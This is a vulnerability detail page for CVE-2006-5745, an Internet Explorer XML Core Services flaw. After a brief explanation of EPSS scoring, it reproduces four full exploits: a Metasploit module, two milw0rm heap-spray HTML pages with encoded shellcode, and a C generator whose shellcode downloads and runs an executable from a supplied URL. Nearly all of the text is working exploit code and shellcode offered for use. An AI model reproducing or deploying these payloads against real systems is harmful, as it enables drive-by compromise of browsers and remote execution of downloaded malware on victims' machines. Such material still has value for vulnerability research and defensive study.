CVE-2006-5745 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: ms06_071_xml_core.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer XML Core Services HTTP Request Handling', 'Description' => %q{ This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modifed version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trirat Puttaraksa <trir00t [at] gmail.com>', ], 'Version' => '$Revision: 9669 $', 'References' => [ ['CVE', '2006-5745' ], ['OSVDB', '29425' ], ['MSB', 'MS06-071' ], ['BID', '20915' ], ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows 2000 SP4 -> Windows 2003 SP0', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 10 2006')) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = rand_text_alpha(rand(30)+2) var_shellcode = rand_text_alpha(rand(30)+2) var_unescape = rand_text_alpha(rand(30)+2) var_x = rand_text_alpha(rand(30)+2) var_i = rand_text_alpha(rand(30)+2) var_size = rand_text_alpha(rand(30)+2) var_nopsize = rand_text_alpha(rand(30)+2) var_limit = rand_text_alpha(rand(30)+2) var_obj = rand_text_alpha(rand(30)+2) var_id = rand_text_alpha(rand(30)+2) # Build out the message content = %Q| <html xmlns="http://www.w3.org/1999/xhtml"> <body> <object id=#{var_id} classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}"> </object> <script> var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_size} = #{var_shellcode}.length * 2; var #{var_nopsize} = 0x400000 - (#{var_size} + 0x38); var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length * 2 < #{var_nopsize}) #{var_buffer}+=#{var_buffer} ; #{var_limit} = (0x12000000 - 0x400000) / 0x400000; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < #{var_limit} ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode}; } var #{var_obj} = null; #{var_obj} = document.getElementById('#{var_id}').object; try { #{var_obj}.open(new Array(), new Array(), new Array(), new Array(), new Array()); } catch(e) {}; #{var_obj}.open(new Object(), new Object(), new Object(), new Object(), new Object()); #{var_obj}.setRequestHeader( new Object(), '......' ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); #{var_obj}.setRequestHeader( new Object(), 0x12345678 ); </script> </body> </html> | content = Rex::Text.randomize_space(content) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN"> <!-- MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit Author: n/a Info: http://blogs.securiteam.com/index.php/archives/721 http://isc.sans.org/diary.php?storyid=1823 http://xforce.iss.net/xforce/alerts/id/239 Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!) Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called. /str0ke --> <html xmlns="http://www.w3.org/1999/xhtml"> <body> <object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" > </object> <script> var obj = null; function exploit() { obj = document.getElementById('target').object; try { obj.open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {}; sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" + "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" + "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" + "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" + "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" + "%uFF57%u63E7%u6C61%u0063"); sz = sh.length * 2; npsz = 0x400000-(sz+0x38); nps = unescape ("%u0D0D%u0D0D"); while (nps.length*2<npsz) nps+=nps; ihbc = (0x12000000-0x400000)/0x400000; mm = new Array(); for (i=0;i<ihbc;i++) mm[i] = nps+sh; obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); obj.setRequestHeader(new Object(),'......'); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); } </script> <body onLoad='exploit()' value='Exploit'> </body></html> # milw0rm.com [2006-11-08]

<html xmlns="http://www.w3.org/1999/xhtml"> <body> <script> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); </script> <script> var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } </script> <object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" > </object> <script> var obj = null; obj = document.getElementById('target').object; try { obj.open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {}; obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); obj.setRequestHeader(new Object(),'......'); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); obj.setRequestHeader(new Object(),0x12345678); </script> </body></html> # milw0rm.com [2006-11-10]

/* *----------------------------------------------------------------------- * * MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit * Works on Windows XP versions including SP2 and 2K * * Author: M03 * * Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), * Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze * : * Tested : * : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer * : * : * : * : * :Usage: filename <exe_URL> [htmlfile] * : filename.exe http://site.com/file.exe localhtml.htm * *------------------------------------------------------------------------ */ #include <stdio.h> #include <stdlib.h> #include <string.h> FILE *fp = NULL; char *file = "MicroHack.htm"; char *url = NULL; unsigned char sc[] = "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; char * header = "<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" "<body>\n" "<object id=target classid=\"CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}\" >\n" "</object>\n" "<script>\n" "var obj = null;\n" "function exploit() {\n" "obj = document.getElementById('target').object;\n" "try {\n" "obj.open(new Array(),new Array(),new Array(),new Array(),new Array());\n" "} catch(e) {};\n" "sh = unescape (\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\" +\n" " "; char * footer = "\n" "sz = sh.length * 2;\n" "npsz = 0x400000-(sz+0x38);\n" "nps = unescape (\"%u0D0D%u0D0D\");\n" "while (nps.length*2<npsz) nps+=nps;\n" "ihbc = (0x12000000-0x400000)/0x400000;\n" "mm = new Array();\n" "for (i=0;i<ihbc;i++) mm[i] = nps+sh;\n" "\n" "obj.open(new Object(),new Object(),new Object(),new Object(), new Object());\n" "\n" "obj.setRequestHeader(new Object(),'......');\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "obj.setRequestHeader(new Object(),0x12345678);\n" "}\n" "</script>\n" "<body onLoad='exploit()' value='Exploit'>\n" "\n" "</body></html>\n" "\n"; // print unicode shellcode void PrintPayLoad(char *lpBuff, int buffsize) { int i; for(i=0;i<buffsize;i+=2) { if((i%16)==0) { if(i!=0) { printf("\"\n\""); fprintf(fp, "%s", "\" +\n\""); } else { printf("\""); fprintf(fp, "%s", "\""); } } printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); } printf("\";\n"); fprintf(fp, "%s", "\");\n"); fflush(fp); } void main(int argc, char **argv) { unsigned char buf[1024] = {0}; int sc_len = 0; if (argc < 2) { printf("MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit (0day)\n"); printf("Code modded from LukeHack\n"); printf("\r\nUsage: %s <URL> [Local htmlfile]\r\n\n", argv[0]); exit(1); } url = argv[1]; if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) { printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); return; } printf("[+] download url:%s\n", url); if(argc >=3) file = argv[2]; printf("[+] exploit file:%s\n", file); fp = fopen(file, "w"); if(!fp) { printf("[-] Open file error!\n"); return; } fprintf(fp, "%s", header); fflush(fp); memset(buf, 0, sizeof(buf)); sc_len = sizeof(sc)-1; memcpy(buf, sc, sc_len); memcpy(buf+sc_len, url, strlen(url)); sc_len += strlen(url)+1; PrintPayLoad(buf, sc_len); fprintf(fp, "%s", footer); fflush(fp); printf("[+] exploit write to %s success!\n", file); } // Reverse Microsoft IE 9/11 Exploit // milw0rm.com [2006-11-10]